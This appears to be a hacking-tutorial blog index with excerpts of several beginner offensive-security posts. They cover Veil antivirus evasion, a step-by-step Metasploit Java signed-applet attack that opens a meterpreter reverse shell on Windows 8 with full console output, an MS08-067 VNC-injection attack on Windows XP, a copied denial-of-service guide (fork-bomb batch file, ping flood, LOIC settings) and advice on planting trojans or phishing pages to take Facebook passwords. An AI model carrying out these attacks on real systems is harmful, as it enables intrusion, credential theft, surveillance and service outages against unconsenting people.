Antivirus Evasion : Bypassing AV with Veil

In real life pentesting scenarios, the antivirus is an added layer of security, which we have conveniently ignored so far. However, in this tutorial we will see how we can encrypt the payload and make it harder for the AV(antivirus) to detect it.

Prerequisites

You should know how the basics of generating payloads using metasploit, i.e. have a basic idea about pentesting. I have covered these already, and won't do so again.
If you haven't got the prerequisites covered, I'd suggesting you start by hacking into an unpatched Windows XP machine.

Install Veil-evasion

This is one the rare moments when you actually have to install a hacking tool in Kali Linux. That said, the process is incredibly simple, and a simple apt-get will work.

sudo apt-get update

sudo apt-get install veil-evasion

Read More

Blind SQL Injection

Only proceed if you know SQL Injection basics. If not, read these posts first-

1. SQL Injection Basics (theoretical yet important)
2. Manual SQL Injection (using web browser only)
3. Automated SQL Injection using SQLMap (Kali Linux)  (this one is optional)

Read More

Real Life Phishing Scenario : Zero Day google bug

A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack Wireless networks, Windows machines, Websites and Social Networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real life incidence of how someone almost got my Email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.

Read More

Java signed applet Hack Windows 8 Java vulnerability

Purpose of this tutorial

In this tutorial we will look at how difficult it can be to hack modern operating systems. While you won't be getting the kind of results you were expecting, you will learn a lot here. The exploit will not work at first go, it will not work in the second go, it will eventually work, but we would have modified too many settings in the target OS to call it success. We will be using a pretty mainstream exploit here, the java signed applet exploit.
(Just in case you're new here. You need to have Kali Linux installed, as well as have some basic info about metasploit. Here is the collection of all tutorials. Read first few or maybe all. I write new posts assuming you've read the previous ones)

• HACKING WINDOWS XP
 
• POST-EXPLOITATION OF WINDOWS XP
 
• CRASHING WINDOWS 7
 
• ARMITAGE : FAST AND EASY HACKING GUI
 
• WINDOWS XP : HOLLYWOOD STYLE HACK

Hack any Windows Version

In the previous tutorials we have hacked Windows XP and tested a few Payloads and its features. In this tutorial, we will use a Java exploit to hack any Windows version. Now there are some things that you need to know-

1. There are no 'type something on console and press enter' exploits for modern Operating Systems. They invest enough in security to patch any such vulnerabilities. 
2. The modern operating systems have exploits where the user has to do something like click on a link, install some program, and in our case, allow java plugin to be used.
3. The Operating systems are quite secure, however the applications installed by the users almost always have some bugs which can be exploited, and then by privilege escalation methods, you can get a administrator shell. Jave is widely used, and is, unfortunately, quite secure (but we will still use a  Java exploit here)
4. If you have the latest OS and latest version of Java installed, then they already know how to deal with these kind of attacks and it won't work. We will use Windows 8 and Java 7 build 60 (I upgraded it today), and our exploit will not work. We will then see how to make it work. We will learn a lot of new things. Please follow along only if you have curiosity for knowledge, not just desire to hack.

Java Signed Applet Exploit (browser based exploit)

Some official words here, to help with your digestion-

This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs the it. The resultin
g signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks "run", the applet executes with full user permissions.

Follow these steps

Commands to execute in bold and red and instruction is green.

root@kali:~# service postgresql start[ ok ] Starting PostgreSQL 9.1 database server: main.
root@kali:~# service metasploit start[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
root@kali:~# msfconsole _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\

Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.
       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1060 exploits - 659 auxiliary - 178 post
+ -- --=[ 275 payloads - 28 encoders - 8 nops
msf > use exploit/multi/browser/java_signed_applet (Java signed applet exploit)    msf  exploit(java_signed_applet) > show options
Module options (exploit/multi/browser/java_signed_applet):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   APPLETNAME      SiteLoader       yes       The main applet's class name.
   CERTCN          SiteLoader       yes       The CN= value for the certificate. Cannot contain ',' or '/'
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion      SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   SigningCert                      no        Path to a signing certificate in PEM or PKCS12 (.pfx) format
   SigningKey                       no        Path to a signing key in PEM format
   SigningKeyPass                   no        Password for signing key (required if SigningCert is a .pfx)
   URIPATH                          no        The URI to use for this exploit (default is random)

Exploit target:
   Id  Name
   --  ----
   1   Windows x86 (Native Payload)

msf  exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp (meterpreter payload)PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(java_signed_applet) > show options
Module options (exploit/multi/browser/java_signed_applet):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   APPLETNAME      SiteLoader       yes       The main applet's class name.
   CERTCN          SiteLoader       yes       The CN= value for the certificate. Cannot contain ',' or '/'
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion      SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   SigningCert                      no        Path to a signing certificate in PEM or PKCS12 (.pfx) format
   SigningKey                       no        Path to a signing key in PEM format
   SigningKeyPass                   no        Password for signing key (required if SigningCert is a .pfx)
   URIPATH                          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST IP needed here   yes       The listen address   LPORT     4444             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   1   Windows x86 (Native Payload)

msf  exploit(java_signed_applet) > set LHOST 192.168.154.134 (type ifconfig to find your Kali IP) LHOST => 192.168.154.134
msf  exploit(java_signed_applet) > exploit
[*] Exploit running as background job.
msf  exploit(java_signed_applet) >
[*] Started reverse handler on 192.168.154.134:4444
[*] Using URL: http://0.0.0.0:8080/ybfxLEoT
[*]  Local IP: http://192.168.154.134:8080/ybfxLEoT (copy this and paste it into the browser of computer you want to hack)[*] Server started.
[*] 192.168.154.1    java_signed_applet - Handling request
[*] 192.168.154.1    java_signed_applet - Handling request
[*] 192.168.154.1    java_signed_applet - Handling request
msf  exploit(java_signed_applet) >

On our Windows 8 machine

If you haven't installed Java then this is what you'll see.

If you have installed Java then this is what you'll see.

Now after you click run this time, you might end up seeing a dialog which blocked access to java plugin even after we allowed it.

If you are using an older version of Java, you might have gained access already, unless your antivirus detected the payload, which is basically a trojan (if you succeed here, a session will be created in metasploit, but it will be in background. See the end of tutorial to find out how to use that session and then come back here to see the scenario in case of Windows 8, there are things to learn) But it my case, now it's time to realize that we've taken a head on collision with a really secure operating system and the latest version of Java. Now, as I said, this will not work, but you can still give it your best shot.

Why won't it work

Java Sandbox

In technical terms : The java-sandbox allows you to securely execute untrusted code (for example, user generated scripts in scripting languages such as groovy or rhino) from within your application. It allows you to specify resources and classes that may be used by the code, thus, separating the execution from the application's execution environment. It allows to wrap execution environments in threads or even execute them remotely on different jvms.(sourceforge)

In less technical terms:In April, Oracle instituted a number of changes starting with Java 7u21. The new update introduced prompts warning users that an unsigned applet could potentially harm the user’s computer. This came months after Oracle changed Java’s default security settings from medium to high, essentially preventing unsigned applets from executing automatically, requiring instead a user to allow the applet to proceed. Developers must now sign their applets with a certificate from a trusted Certificate Authority. (threatpost)

In English : New versions of Java have an added feature known as Java sandbox. Whenever a java applet is loaded on a browser, it will firstly require user's permission to execute. After the user has given permission, the applet will load inside a sandbox (which is a runtime environment seperated from rest of the computer, like a cage, and the java applet is harmless as long as it is inside). That doesn't solve their problem though, as sandbox stops the Java applet to do much, thereby destroying the whole purpose, even for the genuine developers. So, Java restricts the unsigned applets from exercising much of their functionality, and only the signed applets can do anything. So, hats off to Oracle, for proving that even client side vulnerabilities are not that easy. And sorry to disappoint you guys, but I had to tell you how secure the modern operating systems are. Nevertheless, going to Java control panel, and security tab, will lead you to the conclusion that the Java security level is high by default. And even more mind boggling is the fact that the security levels are - medium, high, very high. Guess the days of 'low' security are gone. However, medium is just what we are looking for.

Sandbox is enabled in high level. 

Sandbox is disabled in medium level. That will solve our purpose here.

Now we opened our java applet again and this time a really dangerous looking security warning dialog came up. Nevertheless, we clicked on "I accept" and then run.

As if this wasn't enough. Windows had to interfere. I could almost hear Windows Defender saying, Java is good, but Microsoft still trusts it's own antivirus for security. Our exploit failed yet again. This time it was the antivirus.

You might have guessed, disable the antivirus.

Now, finally, I refreshed the URL, accepted the warning and allowed the applet to run. I got a new session on Metasploit. The sweet smell of success was highly diluted by the fact that we really rigged the game in our favour. In a real life scenario, you can't expect the AV to be disabled and the security settings set to anything other than the default value.

Use the following commands to switch to the created sessions

msf  exploit(java_signed_applet) > sessions

Active sessions

===============

  Id  Type                   Information     Connection

  --  ----                   -----------     ----------

  1   meterpreter x86/win32  Home\Me @ HOME  192.168.154.134:4444 -> 192.168.154.1:49682 (192.168.154.1)

msf  exploit(java_signed_applet) > sessions -h

Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions

    -c <opt>  Run a command on the session given with -i, or all

    -d <opt>  Detach an interactive session

    -h        Help banner

    -i <opt>  Interact with the supplied session ID

    -k <opt>  Terminate session

    -l        List all active sessions

    -q        Quiet mode

    -r        Reset the ring buffer for the session given with -i, or all

    -s <opt>  Run a script on the session given with -i, or all

    -u <opt>  Upgrade a win32 shell to a meterpreter session

    -v        List verbose fields

msf  exploit(java_signed_applet) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > 

From here, all the meterpreter functionality is available. Here is a list which can be obtained by typing help on meterpretor.

meterpreter > help

Core Commands
=============
    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================
    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================
    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================
    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================
    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

Priv: Elevate Commands
======================
    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================
    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================
    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

Conclusion

If you've followed along so far, you might be feeling disappointed. While the feeling is natural, it is quite unnecessary. A better way to look at it is the first step in real world pentesting. All this while we were dealing with non-existent scenarios. Old unpatched grandma's Windows XP machines. These don't exist in the real world. In reality we have to deal with strong defenses, limited rights, antiviruses, firewalls, etc. Soon you'll be writing your own exploits (okay not that soon), and evading firewalls and antiviruses (what we did here is not called evasion, you can't simply turn off antivirus protection like that as you don't have access to the computer). In the next few tutorials we'll see how to get around all the things we did and shouldn't have done (disabling AV and reducing Java protection level). There are things that can't be avoided (the target has to go to a URL containing the applet and allow it to run), but we will try to make things as real world as possible. We will also move to some non-traditional exploits, as their AV detection rate is much less. We will look into encryption and anti-virus evasion in detail. Lot of things need to be done. Just remember, you are in hand to hand combat with one of the most secure systems you'll come across, and it's not gonna be easy.

Read More

Hack Facebook Account : Stuff You Should Know

Hack Facebook?

Okay, so you got lured into the idea of hacking a Facebook account? I won't ask why. Everyone has their reasons. If you came here to learn how to hack a Facebook account, feel free to leave, because the title read - Hack Facebook Account : Stuff You Should Know - and not - How to hack a facebook account (well actually don't leave, I have something for you later in this tutorial, something on actually hacking Facebook) .That being said, there are a lot of real hacking tutorials around the website you might want to read. However, if you are here on a pure curiosity basis, then read on, and you will be a smarter person by the end of this post than you were when you began reading it.

Why not to think about hacking facebook

Search google images for facebook hack and you already
 see so many misleading programs. I mean
just enter user ID and they'll provide
 you with username and password.
It's surprising how many people actually expect it to work.

First, because you can't. Well, actually you can, but the high improbability of success makes it stand next toyou can't hack facebook. If you think typing 'hack facebook account' on google, clicking on the first result, and entering the target's email address will give you the password of his/her Facebook account, then you are not on the general level of stupidity, you have achieved an appreciatively high one. Come on, if it were so easy to hack a FB account no one would be using FB to start with. There is so much on our Facebook account that we can't even imagine the consequences if it were to get into the hands of a seasoned hacker, leave alone a novice (not even a novice for that matter) who just searched google for hacking facebook.
impossible, so much so, that I won't be exaggerating in saying that it can't be hacked. As far as the picture on the left is concerned, its one of the many tools offered on the internet, all of which have the following in common-

1. All have very easy user interface. You just have to enter the user id, and click hack.
2. All have download links which will take you to a survey, or some annoying ads.
3. All are 100% not working.

What does 'hacking Facebook' actually mean?

What is the actual meaning of hacking Facebook. Most of us are misguided by the term hacking in general. Hacking incorporates the attainment of someone's password, but hacking is so much more. Account passwords to hacking are just like coins are to the subway surfer game. You get coins along the way, your progress is partially judged on the basis of coins acquired, but the idea is to find your way through the obstacles and keep moving ahead. In general sense, when you use the term hacking Facebook, you mean to understand the functioning of the website, find out about its database management systems, scripts employed, use of cookies, language on which it is built on, etc. Then you find vulnerabilities in the working of the websites, and code exploits to break through the obstacles and gain privileges into their systems, using suitable payloads. The next step would be privilege escalation. For example, you found out a vulnerability that allows you to look into the database and see the email address and cellphone number of any user. You would want to escalate your privileges and also gain access to their passwords. The last step may be setting up a backdoor, for quicker access next time. Another step might be to clear your traces so that you don't get caught. And trust me, you can't do this. I mean you wouldn't be reading a blog on beginner level hacking on Kali Linux if you had so far with web pentesting. So, the conclusion is that hacking Facebook is a real big deal, not everyone's piece of cake (I admit even I'm nowhere close to the level of expertise where I would be playing with databases on Facebook servers). And the Facebook passwords are just a reward that you get after hacking Facebook. But are we missing something? There can't be only one way to get someone's facebook password. I mean we don't want administrator access to all the Facebook databases, just a password of one of the millions of users. There must be a hole somewhere. That kid next door claims he can get Facebook password of anyone, and he's good, but not 'code a exploit for Facebook' good, no, not that good. This is where social engineering steps in.

Social Engineering

With time, the level of security in all fields of life keeps getting stronger. The element of encryption has reached almost unbeatable stage. With 256 bit encryption, cracking will take practically forever. The element of laziness is in our favor (not everyone upgrades to latest security measures), and so is the element of cost-effectiveness and carelessness (you don't picture a nerd kid with glasses next door when you are deciding between WEP and WPA for your password). But nevertheless, things are changing, but one thing remains constant. Humans. Humans in general are stupid. Not really, a better word would be ignorant, not aware of how stuff works. Most Facebook users have no idea about what all Facebook is doing for their accounts security, and how easily their carelessness can ruin each and every one of Facebook's effort to protect their private information.

Humans are the weakest link in any security system

From leaving one's account logged in to not paying attention to someone who's peeping from behind, watching them type their passwords, humans can be really ignorant. But we need not rely on this level of ignorance for passwords (I stopped using the word stupid because it'll definitely annoy and offend people. I mean not good at computers doesn't really mean stupid. They have other stuff to do than protect their accounts). We can very well get the password of an average internet user who is not very paranoid and cynical about stuff. We can't hack Facebook and gain access to their servers, but your friends machine isn't that well guarded. A virus binded with a game he asked you to fetch in a USB drive? An average person won't think that you might have planted a trojan or a keylogger in the USB drive when he takes a file from you. Or maybe send him a link which will silently install some malware in his computer. Many people don't think twice before clicking on a link (some people do, though). Or maybe make a fake login page and send him a professional looking email, directing him to a website where he ends up receiving a login page somehow (you have to make it look real and genuine, backed up by a nice story, that you can expect the target to buy). There are many more methods. As far as the promise for something later in this tutorial about actual Facebook hacking, I have provided you with a small trailer about what you can do, in the next few tutorials we will discuss stuff in detail. The first tutorial is here.

Credential Harvester To Hack Facebook (Phishing)

I don't usually put this disclaimer, but as it was a tutorial that could potentially lead a lot of people on the wrong track (away from the quest on knowledge and towards the quest for illegal hacking and account passwords), here is a warning. Everything on this site is for educational purposes and I won't be responsible for anything you do with this information. If you do something illegal, the jail time would be yours to serve, not mine. So be careful where you are headed.

Read More

Denial Of Service Attack : Lesson For Life

Introduction

(This post has been sourced from a well known tutorial from Hackforums.net)
I have already written 2 posts on Denial of Service attack. The first one gives an insight to the working of Denial of service by bringing in practical examples (bus stop scenario and online multiplayer game scenario). The second one tells us about the various Denial of Service attack. I'm linking both the articles here for you to read if you want to-

Denial Of Service Attacks : Explained for Beginners and Dummies

Denial Of Service Methods : ICMP, SYN, teardrop, botnets

The thing is, while these two are pretty good reads (first one is a must read for everyone), I read something on HackForums.net which completely captured my attention. This tutorial was found in the premium tutorials section, and looked like this-

I asked coolmagicdude2 if I could post his tutorial on blog, as it would help a lot of users. He agreed. So this tutorial has not been written by me but a well known hacker from hack forums, who calls himself Druidtton of Darksunlight. I loved the tutorial and hope you'd enjoy it too. The tutorial is in first person and has many references to his personal experiences. I haven't replaced the first person to third (I to he, my to his). I have also removed all links, and replaced some.

What is "DDoS"?

Denial of Service attacks(or Distributed Denial of Service attacks[DDoS]) are a form of organized attacks with the goal of taking down a server by overloading it. Often by sending useless information(packets) to a server in massive amounts.

In-fact about a year ago I found one of my (his) websites was accidentally DoS-ing darksunlight.com(I use darksunlight as my webhost) because my PHP script made an infinite loop that sent the same information over and over and over into darksunlight's SQL databases. This one page took this EXTREMELY powerful server down twice in less than a minute. That site has since been deleted.
That story demonstrates that it does not take more than a simple "error" in your code to overload a server.

Keep in mind that altough spreading knowledge is my main goal, performing DDoS attacks is indeed a federal crime in the US.
It is also an international offence and will be punished according to the local laws of the individual's country.

But enough talk. I will now show you a quick example of a DoS attack of sorts you can do on your local computer.

Example Of DOS attack

Keep in mind that this is NOT a real DoS attack, but rather an example to visualize how a DoS attack works.

We will take down YOUR computer.
Step 1
Open up notepad, mousepad, or your favored equivalent.
Step 2
Type in this simple batch command
Code:
:a
start
goto a
Step 3
Save as "dossample.bat" making sure you select "All files" from the "File Type" dialog.
Step 4
Run that sucker, but save your work first, as this will crash even the best computers in a matter of minutes.

What did you learn from this?

Observe how the file rapidly replicates itself, opening a new CMD right after it opens another.
An infinite loop has been created that has filled the RAM with useless and massive amounts of CMDs(or Terminals for you Unix folk)

DDoS attacks work much the same way, except instead of replicating an infinite number of CMDs, they send information(packets) to the server over and over and over again until the server crashes.

What information you may ask?

Anything. Your login name, your 'online' status, a new comment, the number of views on a video, your new high score. Absolutely any information that could be resent a massive amount of times to the same server.

Next we will be discussing the simplest form of DDoS.

DDoS by Ping Flood

Please note that I will be pinging my Localhost. You should too.

Perhaps one of the simplest ways to DoS is by using the 'ping' command built into most operating systems, including all windows and Linux distributions.
Step 1
Start up your server. Mine is apache, but that is beside the point, the server type does not matter. If it has an IP address, it can be pinged. (He paced up really unexpectedly here. You might want to skip this part if you haven't created any local server using apache or any other program.)
Step 2
Type in the ping command
Code:
ping -t -a -l 65500 localhost
Step 3
Press enter and watch it ping the localhost over and over until[/b]
your server crashes, or you get tired of waiting for it to crash.
Since most modern servers can take the stress of the ping flood, you will need to get all your friends to help you ping to bring your server down. Or even slow it down.

Command Explained

ping - tells the computer to ping a server
-t - It will continue to ping the server until the command is closed, or stopped.
-a - Resolves the adress to host names.
-l - Size.

By default the ping will send 32bytes of data to the server, so you must change this to a bigger number. The maximum is 65,500bytes, so that is what we used.

If you send a server any number higher than 65,500bytes it will instantly crash. This is called "Ping of Death".
Like any other thing with the suffix "of Death" it is very rare, and hard to accomplish indeed.
In order to learn more about the Ping of Death, read my huge response to this very thread, here! (I have copied his response to the end of the tutorial)

DDoS by Reloading

Something as simple as reloading a page can take down a server if done enough times.
Step 1
Make a page that lets you submit forms. Method='GET' is better than method='POST' for this, but both will work.
(If you do not understand step 1, just find a page that lets you submit information, like a new comment or upload a picture)
Step 2
Fill out the forms and submit
Step 3
Reload the page
If the page uses the POST method your browser will display a dialog asking if you are sure you want to resend the information, or something to that effect. Simply click "Continue" or "OK".(see now why GET is better?)
Step 4
Keep reloading until server is down.
Their are many add ons and tools that allow you to auto-reload a page. It is a matter of googleing for them. They are widely available and free.

I have just created a program that allows you to Auto-refresh a page using IE. If you are interested please download from:
Host: Darksunlight.com | Size: 9kb | Format: .zip ultra compressed | Platform: Windows

Use the browser extensions instead. Google for auto reload addons for your browser.

This method is very primitive as you can see, but it is probably the best way to DDoS.
In order to learn more about DDoS by reload, read my huge response to this very thread, here!
(I have copied his response to the end of the post)

Low-Orbit Ion Cannon

LOIC (Low Orbit Ion Cannon) is an app, written in C# and developed by praetox, that was used by Anonymous during Project Chanology. It attempts to DoS the target site by using all its bandwidth, sending TCP, UDP, or HTTP requests to the server until it crashes.

(He has stressed the fact enough, but let me remind you again, this is a punishable offense. Use LOIC only on your localhost 127.0.0.1. Don't use it on any online server, they cops will come to get you. In contrast to all other tools on this blog, this one works on Windows.)

Download:
LOIC | Host: SourceForge
Step 1
Download and extract LOIC
Step 2
Open LOIC.exe and fill out the required information.

Instructions for filling out:
IP or URL = IP or URL that you wish to DoS
TCP / UDP message = information being sent, just write something random. Or leave it as default.
Port = Server's port
Method = Server's Method, leave as TCP if unknown
If you are gonna try to take down a website then use HTTP
Speed = set to "<= faster"
Threads = How many users it should simulate, the higher the number the faster it will crash. Set to 10,000. Note that this might make your computer lag, if so, set to a lower amount.
Step 3
Click on "IMMA CHARGIN MAH LAZER"
This starts your the program.
Warning: This tool might not seem like much, but many people of all ages have been arrested and convicted for knowingly using this tool. Remember DoS and DDoS are federal crimes, however insignificant it may seem. Use at your own discretion.

Conclusion

Now you know what a DDoS attack is and you can work to better protect your self.

Their are still many other ways to attack a server, but these are the basics of DoS.
Protect your servers xD

Like any web developer I hope you will use this information for the good.
Sadly i know that their are those among us that are, even now as we read this, plotting how to do harm with this information.
To those, I flip the bird.

Response to Reloading method and ping of death

Question : 

This is a really good theoretical tutorial. Some questions I have though are number 1, how do you make the ping send a packet larger than 65000? And isn't that a really old exploit that only works <=win95?

I also really have doubts about the reloading method. Is it just a theoretical thing that if a site is small enough it could work, or is there actually a practical possibility of it? Are there any examples?

Response:

Both very good questions.

1. The ping of death, or a packet larger than 65,000 is, in fact, a really old exploit that most servers and operating systems have patched. But not all.

It is still quite possible for the Ping of death to work, often with mixed results.

Some of the vulnerable operating systems are: 

Solaris(x86 version) 2.5 & 2.5.1a

MkLinux

Windows NT(mixed results, after microsoft released patch)

Linux, below version 2.0.23

Windows 95

Novell Netware 3.X.X

MacOS <= 7.X.X

And many others...

For a full list of vulnerable operating systems, and their response to a ping of death attack, visit this page. 

2. The reloading method is not only practically plausible, but it happens every day, and most often in accident.

Let me explain, go to... let's say, the front page of hackforums, and hit CTRL+S, this will save the webpage into your hard drive. It will most likely be located under your downloads folder, check the properties for that web document, and all attached files.

The size of the front page of hackforums.net, including all elements displayed(images, CSS files, separate JS file, ect...) is around 500KB.

This might not seem like much, that's much less than the average size of a picture taken with any recent digital camera, but consider this:

As I type this, there are currently around 729 members actively surfing the website. Each of them is downloading around 500KB of data from this server, simple arithmetic tells us that's a total of 364,500KB(roughly 356MB of data, or about the size of a standard definition feature length video-film) of data. 

356MB of data that was transfered from the hackforums.net server, into 729 separate connections.

Still doesn't sound like a lot, does it?

Hackforums.net gets an average of 5 page views, per visitor. That means that each of those 729 people that are online right now, will visit around 5 pages before they leave the site.

Supposing that every page in hackforums.net has a similar size to the front page, of ~500KB(in fact most pages are somewhat larger than that), and knowing that there is a total of 729 people currently online, and supposing that each of them will visit an averge of ~5 pages, then we can create a simple formula to calculate the server stress at this point in time.

X = Average size of a page(~>=500kb)

Y = Visitors online(~729 ATM)

Z = Average of ~5 pages viewed, per visitor

D = Data transfer at any given point

D = (X*Y)*Z

This gives us a total of 1,822,500KB or about 1.73GB(roughly the size of an HD 720p feature length video-film).

That's 1.73GB of data that has just been transferred from hackforums.net to 729 separate connections. 

Still doesn't sound like a lot, right? Well, this has been the total transfer for the past ~5 minutes or so. 

In reality hackforums employs many techniques to minimize data transfers, and so does your browser. Things like an indexed cache or offline stored data can minimize the number of things that have to be downloaded from the web server every time you load(or re-load) a page.

I calculated a total daily download transfer of around 1,133GB per day(roughly 285 FullHD 1080p feature length video-films) for hackforums.net, but you can be sure that it's much larger than that. 

Even then we're only accounting for data transferred as downloads.

We're not even touching the immense amount of uploads, connection request, resolves, pings, local data transfers, SQL INSERTs/UPDATEs/DELETEs, and a slew of other processes that occur every time you load a page.

Let me give you a quick example, in case my explanation wasn't enough.

On October, 25th, 2011 the popular web adventure/comic "Homestuck" released the final page of their 5th 'act' or volume.

The last page was released in the form of a, VERY LONG and VERY AWESOME, flash animation that was around 250KB in size.

(You are welcome to experience it here.)

Said flash animation was hosted on the capacious flash portal, newgrounds.com

Keep in mind that newgrounds.com is a website that experiences millions of daily visits, and they serve flash files that range from a couple KBs to >~100MBs without even breaking a sweat.

Within less than an hour of the release, both newgrounds.com AND the homepage of the homestuck webcomic had been taken down by their own fanbase. 

Everyone was so exited to finally see the last page, that they all rushed in to see the animation at once, and thus crashed both websites with ease.

Both websites kept crashing multiple times during the day, until all the fans had seen it, and had thus stopped loading and reloading that page.

So to recap, not only is DoS by page reload plausible, but it is, without a doubt, the most effective method of DDoS.

_________________________________________________

So this is all there was to the tutorial. I hoped you liked it. If you have any queries feel free to ask.

Read More

Hacking Windows : Totally own it - Hollywood Style

Now while the real life hacking and the one in the movies might seem far from congruent, there is some similarity at least, and in this post, we'll get no shells, no meterpreter, no bullshit. We'll simply get the Windows XP desktop inside our Kali machine like we actually are on it. What we're actually getting is going to be something like this-

If you have any difficulty understanding whats going on, then that's because you skipped over 5 articles on penetration testing. You are recommended to go over last 3 atleast.

• Basics Of Pentesting
• External Sources about Pentesting
• Penetration Testing Level 1: Hacking Windows XP
• Penetration Testing Level 2:Post-exploitation of Windows XP
• Penetration Testing Level 3:Crashing Windows 7

Starting metasploit

You must be having Kali Linux installed, follow the link if you haven't already got Kali Linux.

After that, execute the following commands on terminal to get Metasploit running

service postgresql start

service metasploit start

msfconsole

After this, you metasploit framework will start.

Information Gathering

• Find IP of XP machine by running ipconfig on XP command prompt.
• Find IP of Kali machine by running ifconfig on Kali terminal.

Hacking XP 

Now execute the following code (without the msf> it is there by already) -

msf > use exploit/windows/smb/ms08_067_netapi

It selects the netapi ms08 exploit which is well known for Windows XP. Now execute the following (everything before > will already be there)

msf  exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp 

 Now execute a show options to get an idea what all values need to be filled.

msf  exploit(ms08_067_netapi) >show options

You will need the information gathered from Information Gathering step. Remember - XP -> Remote host (RHOST). This is all we need. Just enter the XP IP instead of 192.168.xxx.xxx

msf  exploit(ms08_067_netapi) > set RHOST 192.168.xxx.xxx

That would be all. Now type exploit and press enter.

msf  exploit(ms08_067_netapi) > exploit

If everything goes right, then you'll have a pretty much movie kind of remote connection working for you, and you'll be able to work stuff like you'd normally do if you had access to the machine.

Read More

Introduction To Armitage in Kali : Hack without one line of code

Fast and easy hacking, that's what the official Armitage website is named as. And fast and easy hacking it is. It is not recommended starting your life as a penetration tester with Armitage. But after you know the basics of metasploit (which you do now), you can take a look at this great tool. And I've started to assume you have Kali Linux installed.

Installing Metasploit

